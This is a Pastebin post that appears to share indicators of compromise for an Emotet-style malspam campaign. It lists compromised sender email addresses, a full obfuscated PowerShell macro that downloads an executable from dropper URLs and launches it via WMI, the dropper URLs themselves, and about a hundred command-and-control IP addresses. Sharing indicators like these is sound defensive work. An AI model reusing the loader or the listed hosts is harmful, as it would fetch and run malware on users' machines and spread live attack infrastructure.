Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Senders (comprometidos):
- diana.medrano@motranosa.com.mx
- jmendoza@pasaford.com.mx
- rino.sorrentino@vulcanogas.it
- Macro Powershell
- $oDc0ni= [TypE]("{1}{4}{2}{3}{0}"-f'tory','S','O.Dir','Ec','YSTEM.I') ;$B50 = [type]("{2}{6}{7}{0}{5}{4}{3}{1}" -F'nEt.s','AGEr','SYS','epOintMaN','c','ervI','tEm','.'); $Mdwtf8y=('Tw'+'9f'+('g'+'cl'));$Web0vpn=$Dzeladc + [char](1 + 1 + 20 + 10 + 10) + $B55e8rf;$Bpss56y=('X'+('xie'+'d')+'al'); $odC0ni::"CReate`DiREc`T`ory"($env:userprofile + ((('Y'+'ZPA'+'ub')+'_'+('1b'+'gYZ')+('P'+'Gtm_8'+'e')+'b'+('Y'+'ZP'))."REp`l`AcE"(('YZ'+'P'),[STrING][CHaR]92)));$Fw7ha2w=(('A'+'jr')+('mc'+'us')); $b50::"s`E`Cu`RiTYpROT`oCol" = (('Tl'+'s1')+'2');$Lhd2v57=('Ab'+('pn7'+'0i'));$Jildyir = (('Ny'+'8')+('k'+'v9'));$I5drvnm=('I'+'e'+('0y'+'89u'));$J2wh0li=('B'+'b'+('q4p'+'xi'));$Dssf7bd=$env:userprofile+((('KfRA'+'u'+'b_1b')+'gK'+('fRG'+'t')+('m_8'+'eb')+('Kf'+'R'))."R`E`PlACE"(('Kf'+'R'),'\'))+$Jildyir+('.'+('e'+'xe'));$Nq29rnl=('Ra'+('ci8'+'km'));$Skqrrpk=.('new'+'-o'+'bject') NeT.wEBClIEnT;$Qu703r_=(('ht'+'t')+'p'+(':/'+'/sa')+'l'+'e'+'sf'+'or'+'c'+('es'+'uppo')+('rt'+'s')+('.c'+'om/')+('wp-adm'+'in/')+'U'+'K'+'4'+('/*h'+'ttps')+('://w'+'ww'+'.s')+'a'+'k'+('ca'+'mphar'+'m')+('a.c'+'o'+'m/')+'wo'+'r'+('dp'+'re')+('ss/'+'L8E'+'/')+('*h'+'t')+('tp'+'://la'+'os'+'onl')+('i'+'ne')+('8'+'8'+'.com/ol'+'d')+('-w'+'eb-'+'b')+'k'+('/M8'+'B')+'/'+('*'+'htt')+'p:'+('//q'+'u')+('i'+'ck')+'to'+('w'+'to')+'wi'+'n'+('g.co'+'m')+'/'+('index'+'in'+'g'+'/N2/*')+('htt'+'p:/'+'/'+'tecn')+('ol'+'ora'+'.c')+('om/g'+'r')+('up-b'+'o/')+('NW'+'d/*h')+('t'+'tp:'+'//g')+'eo'+('f'+'fog')+'le'+'mu'+('s'+'ic')+('.com'+'/'+'wp')+'-'+'ad'+('m'+'in')+'/'+('Mym/'+'*h')+('ttp:/'+'/5')+'8y'+'u'+('esa'+'o.')+('t'+'op/')+('wp'+'-')+('a'+'dm')+'in'+'/'+'HG'+'/')."SPl`It"($Zbtu_23 + $Web0vpn + $Pvot9tw);$Xjgqgwe=('Lz'+'t0'+('i'+'aw'));foreach ($Qhy4kib in $Qu703r_){try{$Skqrrpk."DOWN`L`O`AdfiLe"($Qhy4kib, $Dssf7bd);$Sm5ndz1=(('R2'+'m')+('703'+'_'));If ((.('G'+'et'+'-Item') $Dssf7bd)."LeN`GTH" -ge 33013) {([wmiclass](('wi'+'n')+('3'+'2_Pro'+'ce')+'ss'))."Cr`eA`TE"($Dssf7bd);$Jmxe79n=('N'+'ek'+('i5'+'4v'));break;$P5vziwi=('K'+'2q'+('k'+'jcy'))}}catch{}}$Ju7z0y5=('M'+('qw'+'v'+'pt7'))
- URL Droppers:
- http://salesforcesupports.com/wp-admin/UK4/
- https://www.sakcampharma.com/wordpress/L8E/
- http://laosonline88.com/old-web-bk/M8B/
- http://quicktowtowing.com/indexing/N2/
- http://tecnolora.com/grup-bo/NWd/
- http://geoffoglemusic.com/wp-admin/Mym/
- http://58yuesao.top/wp-admin/HG/
- C2's (Epoch1):
- 200.59.6.174:80
- 59.148.253.194:8080
- 173.212.197.71:8080
- 98.103.204.12:443
- 192.232.229.54:7080
- 185.94.252.12:80
- 74.135.120.91:80
- 5.189.178.202:8080
- 202.134.4.210:7080
- 181.129.96.162:8080
- 70.32.84.74:8080
- 190.190.219.184:80
- 178.250.54.208:8080
- 94.176.234.118:443
- 76.121.199.225:80
- 191.97.154.2:80
- 46.101.58.37:8080
- 103.236.179.162:80
- 217.13.106.14:8080
- 82.76.111.249:443
- 37.179.145.105:80
- 70.32.115.157:8080
- 12.163.208.58:80
- 138.97.60.141:7080
- 188.135.15.49:80
- 201.213.177.139:80
- 109.190.35.249:80
- 183.176.82.231:80
- 70.169.17.134:80
- 128.92.203.42:80
- 177.23.7.151:80
- 51.15.7.189:80
- 46.105.114.137:8080
- 219.92.13.25:80
- 74.58.215.226:80
- 216.47.196.104:80
- 45.33.77.42:8080
- 37.187.161.206:8080
- 51.15.7.145:80
- 181.58.181.9:80
- 175.143.12.123:8080
- 201.71.228.86:80
- 68.183.170.114:8080
- 172.104.169.32:8080
- 79.118.74.90:80
- 181.123.6.86:80
- 109.190.249.106:80
- 51.255.165.160:8080
- 186.103.141.250:443
- 64.201.88.132:80
- 181.61.182.143:80
- 185.94.252.27:443
- 181.56.32.36:80
- 149.202.72.142:7080
- 83.169.21.32:7080
- 178.211.45.66:8080
- 24.232.228.233:80
- 192.241.143.52:8080
- 104.131.41.185:8080
- 77.78.196.173:443
- 212.71.237.140:8080
- 138.97.60.140:8080
- 98.13.75.196:80
- 68.183.190.199:8080
- 60.93.23.51:80
- 152.169.22.67:80
- 170.81.48.2:80
- 188.157.101.114:80
- 87.106.46.107:8080
- 177.129.17.170:443
- 172.86.186.21:8080
- 188.251.213.180:80
- 190.115.18.139:8080
- 189.2.177.210:443
- 111.67.12.221:8080
- 191.182.6.118:80
- 189.223.16.99:80
- 5.89.33.136:80
- 177.144.130.105:8080
- 174.118.202.24:443
- 213.52.74.198:80
- 81.215.230.173:443
- 186.189.249.2:80
- 137.74.106.111:7080
- 2.85.9.41:8080
- 1.226.84.243:8080
- 173.68.199.157:80
- 2.45.176.233:80
- 12.162.84.2:8080
- 46.43.2.95:8080
- 190.101.156.139:80
- 177.144.130.105:443
- 62.84.75.50:80
- 37.183.81.217:80
- 50.28.51.143:8080
- 77.238.212.227:80
- 5.196.35.138:7080
- 186.70.127.199:8090
- 45.46.37.97:80
- 213.197.182.158:8080
- 185.183.16.47:80
- 85.214.26.7:8080
- 51.75.33.127:80
- 190.24.243.186:80
- 177.73.0.98:443
- 190.188.245.242:80
- 209.236.123.42:8080
- 181.30.61.163:443
- 200.127.14.97:80
Add Comment
Please, Sign In to add comment